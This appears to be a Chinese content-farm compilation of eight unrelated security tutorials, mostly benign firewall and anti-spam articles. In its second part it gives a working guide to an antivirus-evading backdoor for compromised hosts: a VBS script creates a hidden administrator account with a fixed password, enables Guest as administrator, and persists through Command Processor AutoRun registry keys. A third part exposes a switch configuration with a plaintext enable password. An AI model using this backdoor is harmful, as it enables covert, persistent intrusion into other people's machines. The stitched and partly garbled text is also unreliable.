“胡萝卜胡”通过精心收集,向本站投稿了8篇打造个性化免杀版防火墙、杀毒软件服务器教程,这里给大家分享一些打造个性化免杀版防火墙、杀毒软件服务器教程,供大家参考。
- 目录
篇1:打造个性化免杀版防火墙、杀毒软件服务器教程
前言:
众所周知,现在越来越多的病毒爱好者为了展示个人能力或一些不可告人的秘密而制作一系列的病毒程式;不过,由于国内大部分用户对网络安全有了更多的了解,都会在自己系统中安装使用防火墙或杀毒软件来保护自己的系统网络安全!因此,这类安全软件的存在成了这些病毒的“拌脚石“,如何扫除这些“拌脚石”也就成了他们所追求的另一种境界:“让病毒程式在系统中如入无人之境”!
常见的病毒保护技术:
加壳压缩或加密(主要是采用网络中流行的加壳程序);
修改病毒程式中的特征码(躲避杀毒软件中的特征码扫描);
在病毒程式激发其功能模块时先检测系统中的安全软件,如存在,则进行清除;
采用内核式、服务级编程方式,使得大部分杀毒软件能查无法清除,此类病毒技术性较强,随着Rootkit源码的公开,该方式也迅速传播…
………
这里讨论病毒保护方式3中的防护方法“打造个性化免杀版安全软件”
1、避开“进程扫描式”追杀;
要避开这种方式的追杀只需要修改主程序文件名就可以避开病毒所采用的“进程扫描式”追杀;
2、避开FindWindowFindWindowExA()函数的追捕;
hwnd=FindWindow(“TApplication”,vbNullString) ;查找特征窗口类名
hwnd=FindWindow(vbNullString,“Pfw”) ;查找特征窗口标题
该方式主要是防止此类函数扫描窗口名或类名以此终止安全软件的运行;使用OllyDbg或SoftICE载入需要打造的防火墙程序PFW.ExE,设置断点USER32.CreateWindowExA()
部分代码:
004EA2B8 /$Content$nbsp; 55 push ebp004EA2B9 |. 8BEC mov ebp,esp
004EA2BB |. 53 push ebx
004EA2BC |. 8B5D 08 mov ebx,dword ptr ss:[ebp+8]
004EA2BF |. 53 push ebx ; /lParam
004EA2C0 |. 8B5D 0C mov ebx,dword ptr ss:[ebp+C] ; |
004EA2C3 |. 53 push ebx ; |hInst
004EA2C4 |. 8B5D 10 mov ebx,dword ptr ss:[ebp+10] ; |
004EA2C7 |. 53 push ebx ; |hMenu
004EA2C8 |. 8B5D 14 mov ebx,dword ptr ss:[ebp+14] ; |
004EA2CB |. 53 push ebx ; |hParent
004EA2CC |. 8B5D 18 mov ebx,dword ptr ss:[ebp+18] ; |
004EA2CF |. 53 push ebx ; |Height
004EA2D0 |. 8B5D 1C mov ebx,dword ptr ss:[ebp+1C] ; |
004EA2D3 |. 53 push ebx ; |Width
004EA2D4 |. 8B5D 20 mov ebx,dword ptr ss:[ebp+20] ; |
004EA2D7 |. 53 push ebx ; |Y
004EA2D8 |. 8B5D 24 mov ebx,dword ptr ss:[ebp+24] ; |
004EA2DB |. 53 push ebx ; |X
004EA2DC |. 51 push ecx ; |Style
004EA2DD |. 52 push edx ; |WindowName ;窗口标题
004EA2DE |. 50 push eax ; |Class ;程序类名
004EA2DF |. 6A 00 push 0 ; |ExtStyle. = 0
004EA2E1 |. E8 7C010>call ; CreateWindowExA
004EA2E6 |. 5B pop ebx
004EA2E7 |. 5D pop ebp
004EA2E8 . C2 2000 retn 20
篇2:教你打造杀毒软件免杀的后门
在安全观念日益强化的今天,想得到台属于自己的肉鸡是不易的,如果说因为管理员发现了自己留在肉鸡上的后门账号而导致肉鸡丢失的话,那就是世间最痛苦的事了,相信大家都不会希望这种事情发生在自己的身上吧!这时候用什么后门来控制肉鸡就成为最让人头疼的问题,而好后门的关键就在于是否会被查杀,下文一起来看看如何打造出自己的免查杀后门吧!
Superdoor3.0这款软件大家都用过或者听过吧?它只有一个可执行程序,文件本身很小,命令简单,运行后,可以起到隐藏账号的效果,管理员在CMD下用“net user”查看
door <用户名>:<口令>
小提示:Superdoor3.0(超级后门3.0),超级用户隐藏器。
运行环境:测试2000通过(须VB运行库)。
运行方法:door <用户>:<密码>例:administrator:123。
功能:它在打开“计算机管理”和CMD时把用户删掉,管理员看过用户后,关闭“计算机管理”或CMD时,用户又回来了,巧妙地躲开管理员的查看,是宝鸡必备良药。
不过使用这个后门建立隐藏帐户容易,后门被发现也很容易。我使用杀毒软件(Norton Anti Virus)查了一下。在/winnt/system32/下会生成一个Cmd.exe文件和感染Conpmgmt.exe文件。
哎,看来Superdoor早就被列入杀毒名单了。而且在杀毒软件将后门程序删除后,再运行CMD命令行回在它上面多出一句:“c:\\WINNT\\system32\\crnd.exe“不是外部或内部命令,也不是可运行的程序或批处理文件”。
看来是文件关联被动了手脚了。经过查找,发现程序写入下面两个键值:
HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\\下的\\Software\\Microsoft\\Command Processor\\Auto Run
先看看这两个位置的介绍:如果/D未在命令行上被指定,当Cmd.exe运行时,它会自动寻找以下Reg_sz/reg_expand_sz注册表变量,
如果其中一个或两个都存在,这两个变量会先予执行。也就是说,只要启动了CMD就会运行上述的脚本,可以说是CMD关联吧。
达到“账号如果被撤除,运行CMD又恢复”的效果,原理就是这样的了。现在我们来根据原理做个不被杀的后门。先建立一个名字为RUN的VBS文件,保存在C:/winnt/system32/下,内容如下:
dim wsh
set wsh=CreateObject(”WScript.Shell“)
wsh.run ”net user hsmw$ qq26836659“,0
wsh.run ”net localgroup administrators hsmw$ /add“,0
wsh.run ”net user guest /active:yes“,0
wsh.run ”net user guest qq26836659“,0
wsh.run ”net localgroup administrators hsmw$ /add“,0
上面一段VBS的意思就是建立个hsmw$的账号,并且加为高级管理组,设置密码为QQ26836659,激活Guest账号,并且加为高级管理组,设置密码为qq26836659。写入注册表中下面的键,关联CMD达到不死的效果:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor\\Auto Run
HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\Auto Run
小提示:在账号后面加入$是为了在输入“net user”时不被轻易地发现,虽然是个“不死账号”,但是在计算机管理可以轻易的查到。
篇3:三层核心+防火墙服务器教程
三层的出口连接防火墙的内口
三层核心交换机最好别用VLAN1连接防火墙内口,可能会因为IP重定向问题导致内网访问外网速度奇慢!!
具体事例及解决办法如下:
某企业网核心为4506,接入基本为2950系列。核心有一块X4548GB&nbs p;-RJ业务板,其中48口上联到防火墙,其他下联到客户端。客户端网关指向核心交换机,上网速度奇慢。指向防火墙则速度正常,防火墙地址为172.16.1.1核心配置如下:
core_switch#showrunBuildingconfiguration...
Currentconfiguration:6061bytes
!
version12.1
noservicepad
servicetimestampsdebuguptime
servicetimestampsloguptime
noservicepassword-encryption
servicecompress-config
!
hostnamecore_switch
!
enablesecret5$1$21p4$rcisbziyY7iFWx0w7jm6d.
enablepasswordkindy
!
vtpmodetransparent
ipsubnet-zero
!
spanning-treeextendsystem-id
!
!
vlan2
namevlan2
!
interfaceGigabitEthernet1/1
!
interfaceGigabitEthernet1/2
!
interfaceGigabitEthernet2/1
descriptionToZXC
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet2/2
descriptionToHYS-310
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet2/3
descriptionToHYS-303
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet2/4
descriptionToPGZ
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet2/5
descriptionToWLZ
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet2/6
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet3/1
descriptionToBACK_24
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet3/2
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet3/3
!
interfaceGigabitEthernet3/4
!
interfaceGigabitEthernet3/5
!
interfaceGigabitEthernet3/6
!
interfaceGigabitEthernet4/1
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
....
....
....
!
interfaceGigabitEthernet4/47
switchporttrunkencapsulationdot1q
switchportmodetrunk
!
interfaceGigabitEthernet4/48
!
interfaceVlan1
ipaddress172.16.1.121255.255.255.0
!
interfaceVlan2
ipaddress172.16.2.1255.255.255.0
!
ipclassless
iproute0.0.0.00.0.0.0172.16.1.1
noiphttpserver
!
!
!
linecon0
password******
login
stopbits1
linevty04
password******
login
!
end
--------------------------------------------
因为上面的配置是把防火墙的内口直接接如了三层核心的VLAN1内,所以出现访问外网速度奇慢的现象,
。
解决办法如下:
1、关闭VLAN1的重定向功能
intvlan1noipredirects
2、将防火墙的内网线接如核心的其他VLAN
篇4:关于防火墙的思考服务器教程
防火墙采用NP技术并不是什么新的概念,那么东软在这一领域的大张旗鼓,又有着怎样的意义呢?
防火墙已经是企业网络必不可少的安全设备,目前市场上的防火墙品牌众多,所采用的技术方案也不尽相同,日前,东软与英特尔紧密合作,推出了全系列基于NP(Network Processor)技术的NETEYE防火墙产品。在此之前,联想、方正等国产厂商也推出了基于NP技术的防火墙产品,这说明NP技术已经逐步得到了用户的认可。
我们知道,NP技术并不是什么新的技术概念,NP,即网络处理器,是英特尔专门为处理数据包而设计。除此之外,防火墙产品设计或采用专用ASIC芯片,或者干脆采用基于x86架构的通用处理器。其中,基于ASIC芯片的防火墙是公认的能够达到线速转发、满足高速网络环境骨干级应用的方案。但是其缺点是缺乏灵活性,由于指令或计算逻辑固化在硬件中,因此不便于修改和升级;此外,现在网络需要的深层次包(L4+)分析,使得ASIC设计复杂度增加,需要非常高的技术含量。与之相比,NP技术完全可编程的特点恰好弥补了ASIC的弱点。
国内很多的防火墙产品以前是采用x86架构通用处理器设计的,虽然在满足功能实现方面具有很好的灵活性,但是x86架构通用处理器毕竟是为数据的处理而设计的,尽管所使用的PCI总线最大带宽达到了1Gb/s,但由于PCI 总线是共享式的,这样,当一个网络组成模块发出指令时,就有可能由于冲突而影响PCI总线传输速度。因此,在流量比较大的网络环境,特别是千兆网络环境中,往往会造成整体网络性能的下降,
此外,x86防火墙的稳定性也存在问题,PCI接口、功耗、灰尘、振动等都有可能导致防火墙的故障。与之相比,专门为处理数据包而设计的NP处理器显然解决了性能和稳定性的问题。因此,国产的防火墙产品在采用了NP处理器之后,往往会有更好的性能表现。
那么,国产的防火墙产品为什么在采用了NP技术之后就具备了市场竞争力能力呢?为此,记者也专门采访了东软网络安全产品营销中心的总经理曹斌先生。“市场没有那么简单,采用了NP技术之后,也不意味着大家的防火墙产品都处于同一个起跑线上,不同的防火墙产品还是具有很大的分别的,需要用户进行认真的分辨,”曹斌表示,“其中最大的差别在于技术上的积累和沉淀。”
曹斌表示,不同的用户对于防火墙产品的需求不完全相同,不能按照同一个标准要求,例如电信用户比较看重防火墙产品的通讯能力,对于界面和接口,以及产品可靠性具有很高的要求,有些用户对于防火墙的速度比较偏重,而有些用户则要求防火墙具有非常好的安全防护策略。因此,防火墙产品并不是功能越全越好,性能越出色越好,要根据用户的需求进行设计。目前,很多国产的防火墙产品仍然在强调单一的性能或者“状态检测”的功能,实际上,这基本上是3年前的技术,如今,防火墙产品的挑战在于如何更好的识别应用,与用户的应用系统很好的结合,提供更强的安全防护。在这个基础上,未来的防火墙产品竞争将更多体现在成本制造方面的竞争,曹斌对此进行了大胆的预测。
专家表示,东软防火墙的优势在于功能,如其独树一帜的流过滤技术,如今,原有的这些功能都移植到了NP架构下,产品的性能和稳定性得到进一步提升,这将大大提高东软防火墙的竞争能力。期待国产防火墙超越“状态检测”阶段,针对VoIP、视频会议、P2P等用户应用,提供更好的安全防护方案。
篇5:构筑自己的防火墙服务器教程
网络是美好的,它可以让我们足不出户就能知晓天下之事,也能够很便捷的和远在天边的朋友聊天通信,但是由于目前操作系统或者是其它网络软件中存在一些缺陷,使得那些别有用心的人可以利用这些缺陷进入你的机器中,如果一个不小心的话,你的绝密文件就会赤裸裸的暴露在网络上,而这还算是好的呢,要是你的资料被悄悄的删除了,你哭都来不及!再加上现在有许多 工具,即使你是一个计算机新手的话,也可以利用它们很轻松的实现自己的 梦,是不是很可怕?如果你想真正确保自己计算机的安全,不妨用Norton Personal Firewall在PC上构筑一个属于自己的防火墙。
一、初识防火墙
所有的Internet通信都是通过独立数据包的交换来完成的,而每个数据包都是由源主机向目标主机传输的,所以数据包是Internet上信息传输的基本单位。虽然我们常说电脑之间的“连接”,但这“连接”实际上是由被“连接”的两台电脑之间传送的独立数据包组成的。为了到达目的地,不论两台电脑是隔着几米远还是在不同的大洲上,每个数据包都必须包含一个目标地址和端口号以及源主机的IP地址及端口号,以便接收者知道是谁发出了这个包。也就是说,每一个在Internet上传送的包,都必须含有源地址和目标地址。一个IP地址总是指向Internet上的一台单独机器,而端口号则和机器上的某种服务或会话相关联。而防火墙的目的就是使用一段“代码墙”把你的电脑和Internet分隔开,
它检查到达防火墙两端的所有数据包,无论是进入还是发出,从而决定该拦截这个包还是将其放行。
因为防火墙检查每个到达你的电脑的数据包,所以在这个数据包被你机上运行的任何软件看到之前,防火墙有完全的否决权,可以禁止你的电脑接收Internet上的任何东西。当第一个请求建立连接的数据包被你的电脑回应后,一个TCP/IP端口被打开。如果到达的数据包不被受理,这个端口就会迅速地从Internet上消失,谁也别想和它连上。但防火墙的真正威力在于选择哪些数据包该拦截,哪些数据包该放行。既然每个到达的数据包都含有正确发送者的IP地址(以便接收者发送回应数据包),那么基于源主机IP地址及端口号和目标主机IP地址及端口号的一些组合,防火墙就可以“过滤”掉一些到达的数据包。
简单一点说来,比如你需要允许远程主机在80端口(http)和你的电脑连接,防火墙就可以检查每个到达的包,并只允许由80端口开始的连接。新的连接将会在所有的其 丝谏媳痪芫。即使你的电脑不小心被装入了特洛伊木马程序,向外界打开了一个监听端口,禁止特洛伊木马通行的扫描也可以检测到它的存在,因为所有联络系统内特洛伊木马程序的企图都被防火墙拦截了。所以ü防火墙可以建立一条安全隧道,以便你的家庭电脑和办公室电脑可以共享文件而不受外来的侵入。你可以在办公室电脑中的防火墙上设定,只允许来自你家庭电脑的IP地址的连接,使用NetBios文件共享端口137-139;类似的,在家庭电脑的防火墙上可以设定,只允许来自你办公室电脑的IP地址的连接,使用137-139端口。这样,两台机器都可以看到对方的NetBios端口,而在Internet上的其它人都看不见这两台机器之间的通讯模式。
篇6:防火墙的策略设计服务器教程
4月到6月,国外传统上称为“防火墙月”,据说这与“防火墙”的诞生有关,此后,每一种革命意义的防火墙技术都在此期间发布。遵照传统,编辑也收集了国内外论坛中的防火墙专帖,一起分享其中的安全理念与部署技巧。
定义所需要的防御能力
防火墙的监视、冗余度以及控制水平是需要进行定义的。通过企业系统策略的设计,IT人员要确定企业可接受的风险水平(偏执到何种程度)。接下来IT人员需要列出一个必须监测什么传输、必须允许什么传输通行,以及应当拒绝什么传输的清单。换句话说,IT人员开始时先列出总体目标,然后把需求分析与风险评估结合在一起,挑出与风险始终对立的需求,加入到计划完成的工作清单中。
关注财务问题
很多专家建议,企业的IT人员只能以模糊的表达方式论述这个问题。但是,试图以购买或实施解决方案的费用多少来量化提出的解决方案十分重要。例如,一个完整的防火墙的高端产品可能价值10万美元,而低端产品可能是免费的;从头建立一个高端防火墙可能需要几个月,
另外,系统管理开销也是需要考虑的问题。建立自行开发的防火墙固然很好,但重要的是,使建立的防火墙不需要高额的维护和更新费用。
体现企业的系统策略
IT人员需要明白,安装后的防火墙是为了明确地拒绝——除对于连接到网络至关重要的服务之外的所有服务。或者,安装就绪的防火墙是为以非威胁方式对“鱼贯而入”的访问提供一种计量和审计的方法。在这些选择中存在着某种程度的偏执狂,防火墙的最终功能可能将是行政上的结果,而非工程上的决策。
网络设计
出于实用目的,企业目前关心的是路由器与自身内部网络之间存在的静态传输流路由服务。因此,基于这一事实,在技术上还需要做出几项决策:传输流路由服务可以通过诸如路由器中的过滤规则在IP层实现,或通过代理网关和服务在应用层实现。
IT人员需要做出的决定是,是否将暴露的简易机放置在外部网络上为Telnet、FTP、News等运行代理服务,或是否设置像过滤器这样的屏蔽路由器,允许与一台或多台内部计算机通信。这两种方式都存在着优缺点,代理机可以提供更高水平的审计和潜在的安全性,但代价是配置费用的增加,以及提供的服务水平的降低。
篇7:防火墙的工作原理服务器教程
“ 会打上我的主意吗?”这么想就对了, 就想钻鸡蛋缝的苍蝇一样,看到一丝从系统漏洞发出的光亮就会蠢蠢欲动!好,如何保护你的网络呢?计算机的高手们也许一张嘴就提议你安装网络的防火墙,那么第一个问题就来了:到底什么是防火墙呢?
什么是防火墙?
防火墙就是一种过滤塞(目前你这么理解不算错),你可以让你喜欢的东西通过这个塞子,别的玩意都统统过滤掉,在网络的世界里,要由防火墙过滤的就是承载通信数据的通信包。
天下的防火墙至少都会说两个词:Yes或者No。直接说就是接受或者拒绝。最简单的防火墙是以太网桥。但几乎没有人会认为这种原始防火墙能管多大用。大多数防火墙采用的技术和标准可谓五花八门。这些防火墙的形式多种多样:有的取代系统上已经装备的TCP/IP协议栈;有的在已有的协议栈上建立自己的软件模块;有的干脆就是独立的一套操作系统,
还有一些应用型的防火墙只对特定类型的网络连接提供保护(比如SMTP或者HTTP协议等)。还有一些基于硬件的防火墙产品其实应该归入安全路由器一类。以上的产品都可以叫做防火墙,因为他们的工作方式都是一样的:分析出入防火墙的数据包,决定放行还是把他们扔到一边。
所有的防火墙都具有IP地址过滤功能。这项任务要检查IP包头,根据其IP源地址和目标地址作出放行/丢弃决定。看看下面这张图,两个网段之间隔了一个防火墙,防火墙的一端有台UNIX计算机,另一边的网段则摆了台PC客户机。
当PC客户机向UNIX计算机发起telnet请求时,PC的telnet客户程序就产生一个TCP包并把它传给本地的协议栈准备发送。接下来,协议栈将这个TCP包“塞”到一个IP包里,然后通过PC机的TCP/IP栈所定义的路径将它发送给UNIX计算机。在这个例子里,这个IP包必须经过横在PC和UNIX计算机中的防火墙才能到达UNIX计算机。
篇8:谈垃圾邮件防火墙产品服务器教程
电子邮件以便捷快速等特点成为人们日常交流必不可少的工具之一,但是我们每天接收到垃圾电子邮件远远超过正常邮件,垃圾邮件给我们带来很大的麻烦, 当一个网民打开电子邮箱,很可能在他收下的10封EMAIL里有8封是垃圾邮件。一位“反垃圾邮件联盟”的专家详细地阐述了这样一个现象:在南方浙江省的一个地区有一家生产塑料筷子的小厂,因为没有太多的钱做广告,于是就花几百块钱找一个服务器地址来狂发邮件,只要有1%的人感兴趣的话,效果就会和做电视广告差不多,但是花的钱却是连电视广告1%的费用都不到。
网络垃圾邮件给我们造成的危害很大,浪费很多的网络资源,也浪费我们宝贵的时间。网络病毒和垃圾邮件永远是网络安全主要的两个方面。目前,垃圾邮件的解决方案多种多样,但主要有四种:客户端的软件解决方案;远程电子邮件过滤服务;企业级软件解决方案;硬件设备。
客户端的软件解决方案就是安装软件,现在的防垃圾邮件软件零零散散,特别是在国内,不管是个人版或者服务器版的防垃圾邮件软件更多的是出自一些个人开发者之手,其中对垃圾邮件的定义不准确,很多人把垃圾邮件定义成病毒。垃圾邮件主要分为广告邮件、匿名骚扰邮件和虚假邮件3种,目前软件主要采用的是根据发信人地址、邮件主题或者是邮件大小等来进行过滤,
但是一方面由于垃圾邮件存在不固定的随机性,因此很难把握垃圾邮件的准确特征,另一方面由于大部分防垃圾邮件工具本身设计上的误区,造成了难以彻底防住垃圾邮件的现状。同时,对于一个大型企业来说,一个防垃圾邮件软件很难档的住每天成千上万,各式各样的垃圾邮件。
目前对于企业用户来说,大部分是采用高级硬件防火墙,个人用户采用软件防火墙。硬件防火墙和软件防火墙相比,有哪些优点呢? 硬件防火墙采用专用的硬件设备,然后集成生产厂商的专用防火墙软件。从功能上看,硬件防火墙内建安全软件,使用专属或强化的操作系统,管理方便,更换容易,软硬件搭配较固定。硬件防火墙效率高,解决了防火墙效率、性能之间的矛盾,可以达到线性。
软件防火墙一般基于某个操作系统平台开发,直接在计算机上进行软件的安装和配置。由于客户平台的多样性,软件防火墙需支持多操作系统,如Unix、Linux、SCO-Unix、Windows等,代码庞大、安装成本高、售后支持成本高、效率低。
1、性能优势。防火墙的性能对防火墙来说是至关重要的。它决定了每秒钟通过防火墙的数据流量。单位是Bps,从几十M到几百M不等,还有千兆防火墙甚至达到几G的防火墙。而软件防火墙则不可能达到如此高的速率。
打造个性化免杀版防火墙、杀毒软件服务器教程(合集8篇)
